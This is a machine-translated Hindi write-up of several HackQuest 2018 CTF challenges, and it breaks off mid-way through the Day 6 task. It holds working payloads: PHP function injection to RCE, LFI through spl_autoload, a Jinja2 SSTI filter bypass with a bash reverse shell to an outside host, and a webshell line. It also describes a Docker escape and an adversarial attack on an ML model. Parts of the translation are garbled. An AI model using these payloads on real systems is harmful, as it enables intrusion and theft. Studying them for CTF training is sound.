🙍 👍🏾 👠 हैकक्वेस्ट 2018. परिणाम और लिखें। दिन 4-7 🦍 🎒 👐🏾

जैसा कि वादा किया गया था, हम वार्षिक हैकक्वेस्ट निर्णयों के दूसरे भाग को पोस्ट कर रहे हैं। दिन 4-7: तनाव बढ़ जाता है, और कार्य अधिक दिलचस्प होते हैं!

सामग्री:

Day4। Imagehub

यह कार्य SPbCTF द्वारा तैयार किया गया था।

हमारी नई रचना इंस्टाग्राम को मार देगी। हम आपको सिर्फ दो शब्दों में समझाएंगे:

1. फिल्टर। आपके अपलोड किए गए चित्रों के लिए नया कभी नहीं देखा गया फ़िल्टर।
2. कैशिंग। कस्टम HTTP सर्वर ब्राउजर कैश में इमेज फाइल्स लैंड सुनिश्चित करता है।

अभी कोशिश करो! imagehub.spb.ctf.su

जीतने के लिए रन / get_the_flag।
कस्टम सर्वर बाइनरी: dppth

संकेत
10/25/2018 20:00
टास्क हल नहीं किया गया था। 24 घंटे जोड़े गए।

10/25/2018 17:00
दो कीड़े हैं जिन्हें हम जानते हैं। पहले एक आपको वेब एप्लिकेशन स्रोत मिलता है, दूसरा आपको आरसीई मिलता है।

अवलोकन:

निष्पादन:

ईएलएफ x86_64
सरल HTTP सर्वर का कार्यान्वयन
यदि अनुरोधित फ़ाइल में निष्पादन योग्य बिट है, तो इसके php-fpm को पास कर दिया गया है
कोड लागू कस्टम etag कैशिंग

वेब पार्ट:

फ़ाइल अपलोड कार्यक्षमता है। पूर्वनिर्धारित फ़िल्टर का उपयोग करके छवि को संशोधित किया जा सकता है।
मूलभूत पेज के साथ व्यवस्थापक पृष्ठ /? व्यवस्थापक = शो

भेद्यता: स्रोत कोड पढ़ना

कैश कार्यक्षमता दिलचस्प लगती है, क्योंकि हम सर्वर को फ़ाइल की हैश मनमानी रेंज (यहां तक कि 1 बाइट रेंज) तक प्राप्त कर सकते हैं।

Etag = sprintf("%08x%08x%08x", file_mtime, hash, file_size);

Hash_function:

 def etag_hash(data): v16 = [0 for _ in range(16)] v16[0] = 0 v16[1] = 0x1DB71064 v16[2] = 0x3B6E20C8 v16[3] = 0x26D930AC v16[4] = 0x76DC4190 v16[5] = 0x6B6B51F4 v16[6] = 0x4DB26158 v16[7] = 0x5005713C v16[8] = 0xEDB88320 v16[9] = 0xF00F9344 v16[10] = 0xD6D6A3E8 v16[11] = 0xCB61B38C v16[12] = 0x9B64C2B0 v16[13] = 0x86D3D2D4 v16[14] = 0xA00AE278 v16[15] = 0xBDBDF21C hash = 0xffffffff for i in range(len(data)): v5 = ((hash >> 4) ^ v16[(hash ^ data[i]) & 0xF]) & 0xffffffff hash = ((v5 >> 4) ^ v16[v5 & 0xF ^ (data[i] >> 4)]) & 0xffffffff return (~hash) & 0xffffffff

दुर्भाग्य से etag निष्पादन योग्य फ़ाइलों (* .php) के लिए छीन लिया गया है:

 stat_0(v2, &stat_buf); if ( stat_buf.st_mode & S_IEXEC ) { setHeader(a2->respo, "cache-control", "no-store"); deleteHeade(a2->respo, "etag"); set_environment_info(a1); dup2(fd, 0); snprintf(s, 4096, "/usr/bin/php-cgi %s", a1->url);

फिर भी पृष्ठ निष्पादन से पहले एक जांच होती है, इसलिए यदि हम सही ढंग से एटैग वैल्यू ( यदि कोई नहीं-मैच ) का अनुमान लगाते हैं, तो सर्वर की तुलना में हमें 304 नॉट मॉडिफाइड स्टेटस रिस्पांस मिलेगा। इसका उपयोग करके हम स्रोत कोड बाइट को बाइट द्वारा ब्रूटफोर्स कर सकते हैं।

 v11 = getHeader(&s.request, "if-modified-since"); if ( v11 ) { v3 = getHeader(&v14, "last-modified"); if ( !strcmp(v11, v3) ) send_status(304); } v12 = getHeader(&s.request, "if-none-match"); if ( v12 ) { v4 = getHeader(&v14, "etag"); if ( !strcmp(v12, v4) ) send_status(304); } exec_and_prepare_response_body(&s, &a2a);

आरई से हमें जो मिला है उसे संक्षेप में बताएं:

टाइमस्टैम्प आसानी से अंतिम-संशोधित प्रतिक्रिया हेडर (स्ट्रिंग -> टाइमस्टैम्प) से पढ़ा जाता है।
रेंज एक बाइट लंबाई की अनुमति देता है (इसलिए हम केवल एक बाइट के लिए हैश प्राप्त करेंगे)
हैश का अनुमान 1 बाइट रेंज (256 संभावित मान) के लिए लगाया जा सकता है
आकार ब्रूटेबल है, लेकिन हमें लक्ष्य फ़ाइल से कम से कम एक बाइट जानने की आवश्यकता है।
चूंकि हम * .php फ़ाइलों के लिए स्रोत प्राप्त करना चाहते हैं, इसकी अच्छी धारणा है, कि फाइल "<? Php" से शुरू हो रही है।

पहला चरण आकार प्राप्त कर रहा होगा, और दूसरा वास्तविक फ़ाइल सामग्री प्राप्त कर रहा है।
मल्टी थ्रेडेड कोड के साथ मैं ~ 1 char / sec की गति तक पहुँच गया, और कुछ फ़ाइलों को डंप कर दिया:

index.php

 <?php // error_reporting(0); if (isset($_GET["admin"]) && (!isset($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW'] !== '888b2f04eef9a49fc87fa81089b736de')) { header('WWW-Authenticate: Basic realm="Admin Area"'); header('HTTP/1.0 401 Unauthorized'); } require "upload.php"; $uploader = new ImageUploader(); $result = $uploader->upload(); if ($result === true) die(); if ($result > 0) { echo "Error: " . $result; } if ($uploader->upload() !== true) { include "templates/main.php"; }

upload.php

  <?php require "includes/uploaderror.php"; require "includes/verify.php"; require "includes/filters.php"; class ImageUploader { const TARGET_DIR = "51a8ae2cab09c6b728919fe09af57ded/"; public function upload() { $result = verify_parameters(); if ($result !== true) { return $result; } $target_file = ImageUploader::TARGET_DIR . basename($_FILES["imageFile"]["name"]); $size = intval($_POST['size']); if (!move_uploaded_file($_FILES["imageFile"]["tmp_name"], $target_file)) { return UploadError::MOVE_ERROR; } $text = $_POST['text']; $filterImage = $_POST['filter']($size, $text); $imagick = new \Imagick(realpath($target_file)); $imagick->scaleimage($size, $size); $imagick->setImageOpacity(0.5); $imagick->compositeImage($filterImage, imagick::CHANNEL_ALPHA, 0, 0); header("Content-Type: image/jpeg"); echo $imagick->getImageBlob(); return true; } }

शामिल हैं / filter.php

 <?php function make_text($image, $size, $text) { $draw = new ImagickDraw(); $draw->setFillColor('white'); $draw->setFontSize( 18 ); $image->annotateImage($draw, $size / 2 - 65, $size - 20, 0, $text); return $image; } function futut($size, $text) { $image = new Imagick(); $pixel = new ImagickPixel( 'rgba(127,127,127,127)' ); $image->newImage($size, $size, $pixel); $image = make_text($image, $size, $text); $image->setImageFormat('png'); return $image; } function incasinato($size, $text) { $image = new Imagick(); $pixel = new ImagickPixel( 'rgba(130,100,255,3)' ); $image->newImage($size, $size, $pixel); $image = make_text($image, $size, $text); $image->setImageFormat('png'); return $image; } function fertocht($size, $text) { $image = new Imagick(); $s = $size % 255; $pixel = new ImagickPixel( "rgba($s,$s,$s,127)" ); $image->newImage($size, $size, $pixel); $image = make_text($image, $size, $text); $image->setImageFormat('png'); return $image; } function jebeno($size, $text) { $image = new Imagick(); $pixel = new ImagickPixel( 'rgba(0,255,255,255)' ); $image->newImage($size, $size, $pixel); $iterator = $image->getPixelIterator(); $i = 0; foreach ($iterator as $row=>$pixels) { $i++; $j=0; foreach ( $pixels as $col=>$pixel ) { $j++; $color = $pixel->getColor(); $alpha = $pixel->getColor(true); $r = ($color['r']+$i*10) % 255; $g = ($color['g']-$j) % 255; $b = ($color['b']-($size-$j)) % 255; $a = ($alpha['a']) % 255; $pixel->setColor("rgba($r,$g,$b,$a)"); } $iterator->syncIterator(); } $image = make_text($image, $size, $text); $image->setImageFormat('png'); return $image; } function kuthamanga($size, $text) { $image = new Imagick(); $pixel = new ImagickPixel( 'rgba(127,127,127,127)' ); $image->newImage($size, $size, $pixel); $iterator = $image->getPixelIterator(); $i = 0; foreach ($iterator as $row=>$pixels) { $i++; $j=0; foreach ( $pixels as $col=>$pixel ) { $j++; $color = $pixel->getColor(); $alpha = $pixel->getColor(true); $r = ($color['r']+$i) % 255; $g = ($color['g']-$j) % 255; $b = ($color['b']-$i) % 255; $a = ($alpha['a']+$j) % 255; $pixel->setColor("rgba($r,$g,$b,$a)"); } $iterator->syncIterator(); } $image = make_text($image, $size, $text); $image->setImageFormat('png'); return $image; }

/ uploaderror.php शामिल है

  <?php class UploadError { const POST_SUBMIT = 0; const IMAGE_NOT_FOUND = 1; const NOT_IMAGE = 2; const FILE_EXISTS = 3; const BIG_SIZE = 4; const INCORRECT_EXTENSION = 5; const INCORRECT_MIMETYPE = 6; const INVALID_PARAMS = 7; const INCORRECT_SIZE = 8; const MOVE_ERROR = 9; }

शामिल / सत्यापित करें

  <?php function verify_parameters() { if (!isset($_POST['submit'])) { return UploadError::POST_SUBMIT; } if (!isset($_FILES['imageFile'])) { return UploadError::IMAGE_NOT_FOUND; } $target_file = ImageUploader::TARGET_DIR . basename($_FILES["imageFile"]["name"]); $imageFileType = strtolower(pathinfo($_FILES["imageFile"]["name"], PATHINFO_EXTENSION)); $imageFileInfo = getimagesize($_FILES["imageFile"]["tmp_name"]); if($imageFileInfo === false) { return UploadError::NOT_IMAGE; } if ($_FILES["imageFile"]["size"] > 1024*32) { return UploadError::BIG_SIZE; } if (!in_array($imageFileType, ['jpg'])) { return UploadError::INCORRECT_EXTENSION; } $imageMimeType = $imageFileInfo['mime']; if ($imageMimeType !== 'image/jpeg') { return UploadError::INCORRECT_MIMETYPE; } if (file_exists($target_file)) { return UploadError::FILE_EXISTS; } if (!isset($_POST['filter']) || !isset($_POST['size']) || !isset($_POST['text'])) { return UploadError::INVALID_PARAMS; } $size = intval($_POST['size']); if (($size <= 0) || ($size > 512)) { return UploadError::INCORRECT_SIZE; } return true; }

यह हमें देता है:

व्यवस्थापक मूलभूत के लिए उपयोगकर्ता नाम / पासवर्ड। पूरी तरह से बेकार है, यह केवल स्ट्रिंग प्रिंट करता है:
Congratz। अब आप सूत्रों को पढ़ सकते हैं। गहरा जाओ।
फंक्शन इंजेक्शन (FI) ' फिल्टर ' इनपुट पर।
छवि अपलोड सत्यापन अब हमारे लिए स्पष्ट है।
ImageMagic लाइब्रेरी का उपयोग किया जाता है। यह मानते हुए कि इसका उपयोग शोषण के लिए किया जाता है, एक घातक है। मुझे नहीं लगता कि एफआई पर भरोसा किए बिना इसका फायदा उठाने का कोई तरीका है।

भेद्यता: समारोह इंजेक्शन

फ़ाइल अपलोड .php में कुछ संदिग्ध कोड हैं:

 $filterImage = $_POST['filter']($size, $text);

हम इसे सरल कर सकते हैं:

 $filterImage = $_GET['filter'](intval($_GET['size']), $_GET['text']);

आप वास्तव में कुछ फजीहत करके इस भेद्यता का पता लगा सकते हैं। " फ़िल्टर " इनपुट में " var_dump " या " debug_zval_dump " जैसे फ़ंक्शन नाम भेजने से सर्वर से दिलचस्प प्रतिक्रियाएं आएंगी ।

 int(51) string(10) "jsdksjdksds"</code> So, its not hard to guess how server side code looks like. If we had an write permission to www root, than we could just use two functions: <code>file_put_contents(0, "<?php system($_GET[a]);") chmod(0, 777)

लेकिन यह हमारा मामला नहीं है। कार्य को हल करने के कम से कम दो तरीके हैं।

filter_input_array वेक्टर (अनजाने समाधान): RCE वेक्टर

आरसीई प्राप्त करने के संभावित तरीकों के बारे में सोचते हुए, मैंने देखा कि function filter_input_array हमें $filterImage variable पर बहुत अच्छा नियंत्रण देता है।

फ़िल्टर तर्क को दूसरे तर्क के रूप में पारित करने, फ़ंक्शन परिणाम पर मनमानी सरणी बनाने की अनुमति देगा।

लेकिन ImageMagic इमेजिक वर्ग के अलावा कुछ भी पाने की उम्मीद नहीं कर रहा है। :(

हो सकता है कि हम इनपुट से कक्षा को अनसुना कर सकें? चलिए filter_input_array विवरण पर अतिरिक्त फ़िल्टर तर्क खोजें ।

यह फ़ंक्शन पेज पर ही उल्लेख नहीं किया गया है, लेकिन हम वास्तव में इनपुट सत्यापन के लिए कॉलबैक पास कर सकते हैं। FILTER_CALLBACK उदाहरण filter_input के लिए है, लेकिन यह filter_input_array लिए भी काम करता है!

इसका मतलब है कि हम एक तर्क (eval? सिस्टम?) के साथ फ़ंक्शन का उपयोग करके कस्टम उपयोगकर्ता इनपुट को "मान्य" कर सकते हैं, और हमारे पास तर्क पर नियंत्रण है।

 FILTER_CALLBACK = 1024

RCE प्राप्त करने के लिए उदाहरण:

 GET: a=/get_the_flag POST: filter=filter_input_array size=1 text[a][filter]=1024 text[a][options]=system submit=1

उत्तर:

 *** Wooooohooo! *** Congratulations! Your flag is: 1m_t3h_R34L_binaeb_g1mme_my_71ck37 -- SPbCTF (vk.com/spbctf)

खोजी पंक्ति: 1m_t3h_R34L_binaeb_g1mme_my_71ck37

कुछ निश्चित रूप से गलत लग रहा था, क्योंकि हमें स्रोत कोड प्राप्त करने की आवश्यकता क्यों होगी? सिर्फ एक संकेत के लिए? अपलोड की गई फ़ाइलों को डिस्क पर क्यों संग्रहीत किया गया था, क्या यह अधिक सुविधाजनक नहीं है कि चुनौती उपयोगकर्ताओं से जंक फ़ाइलों को संग्रहीत न करें?

फ़िल्टर नामकरण में संयोग = फ़िल्टर _input_array, पाठ [a] [ फ़िल्टर ] ने मुझे एक विश्वास दिलाया कि सब कुछ उम्मीद के मुताबिक किया गया था ("कभी नहीं देखा गया फ़िल्टर ", ✓)।

spl_autoload वेक्टर: LFI वेक्टर

समाधान प्रस्तुत करने के बाद मुझे चुनौती देने वाले लेखकों में से एक से संपर्क हुआ, जिन्होंने कहा कि मेरा वेक्टर इरादा नहीं था और एक अन्य फ़ंक्शन का उपयोग किया जा सकता है ( spl_autoload ):

यह स्पष्ट नहीं है कि हम इस फ़ंक्शन का उपयोग कैसे कर सकते हैं क्योंकि जैसा कि "<class_name> <some_extension>" नामक फ़ाइल से एक वर्ग "<class_name>" लोड करना है। हस्ताक्षर निम्नलिखित है:

 void spl_autoload ( string $class_name [, string $file_extensions = spl_autoload_extensions() ] )

हमारा पहला तर्क केवल संख्या (1-512) हो सकता है, इसलिए कक्षा का नाम एक ... संख्या? ... अजीब है।
एक्सटेंशन तर्क भी अनुपयोगी लगता है, नियंत्रित फाइलें अपलोड से एक स्तर अधिक गहरी हैं। हमें (हमें एक उपसर्ग पास करने की आवश्यकता है)।

इस तरह से उपयोग किए जाने पर यह फ़ंक्शन वास्तव में हमें एक LFI दे सकता है:

 spl_autoload(51, "a8ae2cab09c6b728919fe09af57ded/1.jpg") = include("51a8ae2cab09c6b728919fe09af57ded/1.jpg")

निर्देशिका नाम लीक स्रोत कोड से हासिल किया गया है। और हम भाग्यशाली हो गए, क्योंकि अगर नाम का पहला चरित्र संख्या के अलावा कुछ भी था -> हम वहां से फाइलें शामिल नहीं कर सकते थे।

तो ... अब हमें बस एक "दयालु-वैध" ( getimagesize को इसे स्वीकार करना होगा) पास करना है। * । Php कोड के साथ फ़ाइल को संशोधित किया गया है। सरल उदाहरण (एक्सिफ में php पेलोड) जुड़ा हुआ है।

इसे 1111.jpg के रूप में अपलोड करें, और करें:

प्राप्त:
a = / get_the_flag

पोस्ट:
फ़िल्टर = spl_autoload
आकार = 51
पाठ = a8a2cab09c6b728919fe09af57ded / 1111.jpg
जमा करना = १

उत्तर:

... .JFIF ... Exif MM * . " (. . .i . . D . D .. V ..
*** Wooooohooo! ***

Congratulations! Your flag is:
1m_t3h_R34L_binaeb_g1mme_my_71ck37

-- SPbCTF (vk.com/spbctf)

खोजी पंक्ति: 1m_t3h_R34L_binaeb_g1mme_my_71ck37
अपलोड और एलएफआई एक अनुरोध में किया जा सकता है।

Day5। समय

यह कार्य डिजिटल सुरक्षा टीम द्वारा तैयार किया गया था
पहली चीज जो आपको चाहिए, वह है समय को वश में करने की, दूसरी छोटी दुनिया से परे जाने की। उसके बाद आपको बॉस के अंतिम स्तर के खिलाफ एक हथियार मिलेगा। अ छा!

51.15.75.80

संकेत
10/27/2018 16:00
ओह, एक बॉक्स पर कितने डिवाइस ... क्या वे वास्तव में उपयोगी हैं?
10/27/2018 14:35
यदि आप टाइमपैनल पर फ़िल्टर का सामना करने में सक्षम थे, तो आप एक संपूर्ण सिस्टम की क्षमताओं का उपयोग कर सकते हैं। शरमाओ मत।
10/27/2018 14:25
वर्चुअल होस्ट की जाँच करें और 200 पर निवास न करें
10/26/2018 19:25
टास्क हल नहीं किया गया था। 24 घंटे जोड़े गए।
10/26/2018 17:35
अपनी सभी क्षमताओं का उपयोग करें।
10/26/2018 12:25
किसी कार्य के किसी भी चरण को पूरा करने के लिए आपको किसी फोरेंसिक सॉफ़्टवेयर की आवश्यकता नहीं है।

1) वर्डप्रेस

प्रारंभ में, हमें पता 51.15.75.80 दिया गया था ।
हम हेहडिर्ब चलाते हैं - हम डायरेक्टरी / वर्डप्रेस / देखते हैं। तुरंत व्यवस्थापक के अंतर्गत व्यवस्थापक पैनल पर जाएं : व्यवस्थापक ।
व्यवस्थापक पैनल में, हम देखते हैं कि टेम्प्लेट बदलने के लिए कोई विशेषाधिकार नहीं हैं, इसलिए आप केवल आरसीई प्राप्त नहीं कर सकते। हालाँकि, एक छिपी हुई पोस्ट है:
09/25/2018 ADMINISTRATOR द्वारा
निजी: समय पैनल के बारे में नोट्स
लॉगिन: क्रिस्टोफर
पासवर्ड: L2tAPJReLbNSn085lTvRNj
होस्ट: timepanel.zn

2) SSTI

जाहिर है, आपको वर्चुअल होस्ट timepanel.zn को निर्दिष्ट करके उसी सर्वर पर जाने की आवश्यकता है ।
हम इस होस्ट पर हेधिरब शुरू करते हैं - हम / Ad_auth निर्देशिका देखते हैं, हम ऊपर दिए गए लॉगिन और पासवर्ड के तहत जाते हैं। हम उस रूप को देखते हैं जिसमें आपको कुछ जानकारी प्राप्त करने के लिए तिथियों ("से" और "से") में प्रवेश करना होगा। उसी समय, हम प्रतिक्रिया HTML कोड में एक टिप्पणी देखते हैं, जहाँ समान तिथियां दिखाई देती हैं:

 <!- start time: 2018-10-25 20:00:00, finish time:2018-10-26 20:00:00 ->

जाहिर है, यहां बग सबसे अधिक संभावना इस प्रतिबिंब से संबंधित होना चाहिए, और यह XSS होने की संभावना नहीं है, इसलिए SSTI का प्रयास करें:

 start=2018-10-25+20%3A00%3A00{{ 1 * 0 }}&finish=2018-10-26+20%3A00%3A00

उत्तर है:

 <!- start time: 2018-10-25 20:00:000, finish time:2018-10-26 20:00:00 ->

{{आत्म}}, {{'a' * 5}} भेजने से हमें पता चलता है कि यह जिंजा 2 है , लेकिन मानक वैक्टर काम नहीं करते हैं। {{ब्रैकेट्स}} के बिना वैक्टर भेजना, हम देखते हैं कि उत्तर "_" वर्णों को प्रतिबिंबित नहीं करता है और कुछ शब्द, उदाहरण के लिए, "वर्ग"। यह फ़िल्टर request.args और! Attr () निर्माण के उपयोग के माध्यम से आसानी से बाईपास किया गया है, साथ ही एक एस्केप अनुक्रम के साथ कुछ बाइट्स के एन्कोडिंग।

बैककनेक्ट के लिए अंतिम क्वेरी

POST /adm_main?sc=from+subprocess+import+check_output%0aRUNCMD+%3d+check_output&cmd=bash+-c+'bash+-i+>/dev/tcp/deteact.com/8000+<%261' HTTP/1.1
Host: timepanel.zn
Content-Type: application/x-www-form-urlencoded
Content-Length: 616
Cookie: session=eyJsb2dnZWRfaW4iOnRydWV9.DrOOLQ.ROX16sOUD_7v5Ct-dV5lywHj0YM

start={{ ''|attr('\x5f\x5fcl\x61ss\x5f\x5f')|attr('\x5f\x5f\x6dro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(2)|attr('\x5f\x5fsubcl\x61sses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(40)('/var/tmp/BECHED.cfg','w')|attr('write')(request.args.sc) }}
{{ ''|attr('\x5f\x5fcl\x61ss\x5f\x5f')|attr('\x5f\x5f\x6dro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(2)|attr('\x5f\x5fsubcl\x61sses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(40)('/var/tmp/BECHED.cfg')|attr('read')() }}
{{ config|attr('from\x5fpyfile')('/var/tmp/BECHED.cfg') }}
{{ config['RUNCMD'](request.args.cmd,shell=True) }}
&finish=2018-10-26+20%3A00%3A00

3) एलपीई

RCE प्राप्त करने के बाद, हम समझते हैं कि आपको विशेषाधिकारों को जड़ तक बढ़ाने की आवश्यकता है। कई झूठे रास्ते हैं (/ usr / bin / special, /opt/privesc.py और कुछ और) जो मैं केवल समय लेने के बाद से वर्णन नहीं करना चाहता। एक बिनार / usr / बिन / शून्य भी है, जिसमें एक सूद-बिट नहीं है, लेकिन यह पता चला है कि यह किसी भी फाइल को पढ़ सकता है (बस इसे स्टेक में हेक्स-एन्कोडेड पथ भेज सकता है)।

कारण क्षमताएं (/ usr / bin / zero = cap_dac_read_search + ep) है।
हम छाया को पढ़ते हैं, हैश को ब्रश करने के लिए सेट करते हैं, लेकिन जब इसे ब्रश किया जाता है, तो हम अनुमान लगाते हैं कि हमें सिस्टम पर मौजूद किसी अन्य उपयोगकर्ता की फ़ाइल पढ़ने की आवश्यकता है:

$ echo /home/cristopher/.bash_history | xxd -p | zero

मैं आपके लिए कुछ पढ़ सकता हूं
सु
Dpyax4TkuEVVsgQNz6GUQX

4) डॉकर भागने / फोरेंसिक

तो, हमारे पास एक जड़ है। लेकिन यह अंत नहीं है। हमने एप्टून्स्टेलीट स्थापित किया है और फाइल सिस्टम में कई और दिलचस्प फाइलें ढूंढी हैं जो अगले चरण से संबंधित हैं:

टिकट पाने के लिए, आपको एक छवि बदलने की आवश्यकता है ताकि इसे "1" के रूप में पहचाना जाए। आपके पास एक मॉडल और एक छवि है। कर्ल -X POST -F चित्र=@ZeroSource.bmp 'http://51.15.100.188 {6491 / भविष्यवाणी'।

तो, अब हम मशीन लर्निंग मॉडल के लिए एक प्रतिस्पर्धी उदाहरण बनाने के मानक कार्य के साथ सामना कर रहे हैं। हालाँकि, इस स्तर पर मुझे अभी भी वे सभी फाइलें नहीं मिल सकीं जिनकी मुझे जरूरत थी। यह केवल सर्वर पर आर-स्टूडियो एजेंट डालकर और दूरस्थ फोरेंसिक से निपटने के द्वारा ऐसा करना संभव था। लगभग जो मुझे चाहिए था उसे बाहर निकाल दिया, मुझे पता चला कि, वास्तव में, डॉकटर कंटेनर एक ऐसे मोड में चल रहा है जो आपको पूरे डिस्क को माउंट करने की अनुमति देता है

हम माउंट / देव / vda1 / रूट / केके बनाते हैं और होस्ट फ़ाइल सिस्टम तक पहुंच प्राप्त करते हैं, और एक ही समय में पूरे सर्वर तक रूट एक्सेस (जब से हम अपनी स्वयं की कुंजी डाल सकते हैं)। हम KerasModel.h5, ZeroSource.bmp को निकालते हैं।

5) सलाहकार एमएल

यह तस्वीर से तुरंत स्पष्ट है कि तंत्रिका नेटवर्क MNIST डेटासेट पर प्रशिक्षित है। जब हम सर्वर पर एक मनमानी तस्वीर भेजने की कोशिश करते हैं, तो हमें जवाब मिलता है कि चित्र बहुत अलग हैं। इसका मतलब है कि सर्वर वैक्टर के बीच की दूरी को मापता है, क्योंकि यह बिल्कुल एक प्रतिकूल उदाहरण चाहता है, न कि केवल चित्र "1" के साथ।

हम पहले हमले की कोशिश करते हैं जो हमें मूर्ख बॉक्स से मिलता है - हम हमलावर वेक्टर प्राप्त करते हैं, लेकिन सर्वर इसे स्वीकार नहीं करता है (दूरी बहुत महान है)। फिर मैं विन्डल्स में चला गया, एमएनआईएसटी के तहत एक पिक्सेल हमले के कार्यान्वयन को रीमेक करना शुरू कर दिया, और कुछ भी काम नहीं किया, क्योंकि यह हमला विभेदक विकास एल्गोरिथ्म का उपयोग करता है, यह ढाल नहीं है और प्रायिकता वेक्टर में परिवर्तन के लिए निर्देशित न्यूनतम स्टोचस्टिक खोजने की कोशिश करता है। लेकिन संभावनाओं का वेक्टर नहीं बदला, क्योंकि तंत्रिका नेटवर्क बहुत आश्वस्त था।

अंत में, मुझे उस संकेत के बारे में याद रखना था जो सर्वर पर मूल पाठ फ़ाइल में था - "(नॉर्मलाइज़ ^ ^ _ ^")। सावधान सामान्यीकरण के बाद, एल-बीएफजीएस अनुकूलन एल्गोरिथ्म का उपयोग करके हमले को प्रभावी ढंग से करना संभव था, नीचे अंतिम शोषण है:

 import foolbox import keras import numpy as np import os from foolbox.attacks import LBFGSAttack from foolbox.criteria import TargetClassProbability from keras.models import load_model from PIL import Image image = Image.open('./ZeroSource.bmp') image = np.asarray(image, dtype=np.float32) / 255 image = np.resize(image, (28, 28, 1)) kmodel = load_model('KerasModel.h5') fmodel = foolbox.models.KerasModel(kmodel, bounds=(0, 1)) adversarial = image[:, :] try: attack = LBFGSAttack(model=fmodel, criterion=TargetClassProbability(1, p=.5)) adversarial = attack(image[:, :], label=0) except: print 'FAIL' quit() print kmodel.predict_proba(adversarial.reshape(1, 28, 28, 1)) adversarial = np.array(adversarial * 255, dtype='uint8') im = Image.open('ZeroSource.bmp') for x in xrange(28): for y in xrange(28): im.putpixel((y, x), int(adversarial[x][y][0])) im.save('ZeroSourcead1.bmp') os.system("curl -X POST -F image=@ZeroSourcead1.bmp 'http://51.15.100.188:36491/predict'")

खोजी पंक्ति: H3y_Y0u'v_g01_4_n1c3_t1cket

Day6। बहुत बढ़िया वी.एम.

यह कार्य स्कूल सीटीएफ टीम द्वारा तैयार किया गया था।
एक नई प्रशिक्षण सेवा देखें! zn.sibears.ru:8000

अभी हम आपको बीटा-टेस्टिंग में एक नई वर्चुअल मशीन को शामिल करना चाहते हैं जो विशेष रूप से हमारे newbies के प्रोग्रामिंग कौशल के परीक्षण के लिए बनाई गई है। हमने धोखाधड़ी के खिलाफ बौद्धिक सुरक्षा को जोड़ा है और अब प्लैटफोटम की पेशकश करने से पहले सब कुछ अच्छी तरह से जांचना चाहते हैं। VM आपको सरल प्रोग्राम चलाने की अनुमति देता है ... या केवल?

goo.gl/iKRTrH

संकेत
10/27/2018 16:20
शायद आप AI सिस्टम को मूर्ख या बायपास कर सकते हैं?

विवरण:

सेवा sibVM दुभाषिया द्वारा स्वीकार किए गए .cmpld एक्सटेंशन वाली फ़ाइलों के लिए एक सत्यापन प्रणाली है। भेजे गए प्रोग्राम को हल करना चाहिए जो कार्य: input.txt फ़ाइल में सूचीबद्ध संख्याओं के योग की गणना करें, कुछ हद तक एक एसीएम प्रतियोगिता की याद दिलाता है। इसके अलावा, वेब इंटरफ़ेस का वर्णन इंगित करता है कि भेजे गए कार्यक्रमों को कृत्रिम बुद्धिमत्ता का उपयोग करके जांचा जाएगा।

सेवा में दो डॉकटर कंटेनर होते हैं: वेब-डोकर और prod_inter ।

वेब-डॉक विश्लेषण के लिए विशेष रूप से दिलचस्प नहीं है। वह जो कुछ भी करता है वह भेजे गए फ़ाइल को prod_inter कंटेनर में अनुवाद करता है, जिसके अंदर सभी सबसे दिलचस्प होते हैं। इसी कोड स्निपेट को नीचे प्रस्तुत किया गया है:

Prod_inter कंटेनर में, भेजी गई फ़ाइल की जाँच की जाती है और परीक्षण डेटा पर निष्पादित की जाती है। प्रत्येक भेजने के लिए, एक नई निर्देशिका / tmp / यादृच्छिक पर बनाई जाती है, जहाँ भेजे गए फ़ाइल को यादृच्छिक नाम के तहत सहेजा जाता है। फ़्लैग.टैक्स फ़ाइल को भी बनाई गई डायरेक्टरी में रखा गया है, जो कि शायद हमारा लक्ष्य है।

फिर मज़ेदार हिस्सा शुरू होता है: यदि फ़ाइल 8192 बाइट्स से बड़ी है, तो कृत्रिम बुद्धि का उपयोग करके प्रोग्राम की इनपुट फ़ाइल की जाँच की जाती है। एआई एक पूर्व-प्रशिक्षित अल्ट्रास्पाइस न्यूरल नेटवर्क है। यदि परीक्षण सफल था (इनपुट डेटा 8192 बाइट्स से अधिक है, और तंत्रिका नेटवर्क ने उन्हें प्रथम श्रेणी में सौंपा है), कार्यक्रम पांच अलग-अलग परीक्षणों पर चलता है, और परिणाम एक प्रतिक्रिया संदेश में भेजा जाता है और उपयोगकर्ता को प्रदर्शित होता है।

यदि इनपुट डेटा का आकार 8192 बाइट्स से कम है, या उन्होंने तंत्रिका नेटवर्क द्वारा परीक्षण पास नहीं किया है, तो परीक्षण करने से पहले फ्लैग की उपस्थिति के लिए प्रोग्राम की एक अतिरिक्त जांच होती है। इसमें सब्स्टिट्यूट की उपस्थिति और उस नाम के साथ एक फ़ाइल खोलने के प्रयासों के लिए। फ़्लैग.टैक्स फ़ाइल की पहुंच को secfilter सैंडबॉक्स में प्रोग्राम को चलाकर मॉनिटर किया जाता है, जो SECCOMP तकनीकों पर आधारित है, और निष्पादन लॉग का विश्लेषण करता है। नीचे दी गई सेवा कोड और लॉग का एक उदाहरण है जब निषिद्ध फ़ाइल खोलने की कोशिश की जा रही है:

इस कार्य को हल करने के लिए, मैंने sibVM दुभाषिया के लिए कार्यक्रमों का एक समूह तैयार किया, जो flag.txt फ़ाइल को खोलता है और फ़ाइल के ith बाइट का संख्यात्मक मान प्रदर्शित करता है। एक ही समय में प्रत्येक कार्यक्रम सफलतापूर्वक एआई परीक्षण पास करता है। अगला, तंत्रिका नेटवर्क का एक सतह विश्लेषण और आभासी मशीन का विवरण प्रस्तुत किया जाएगा।

तंत्रिका नेटवर्क विश्लेषण

प्रशिक्षित तंत्रिका नेटवर्क मॉडल cnn_model.h5 फ़ाइल में निहित है। नेटवर्क आर्किटेक्चर के बारे में सामान्य जानकारी निम्न है।

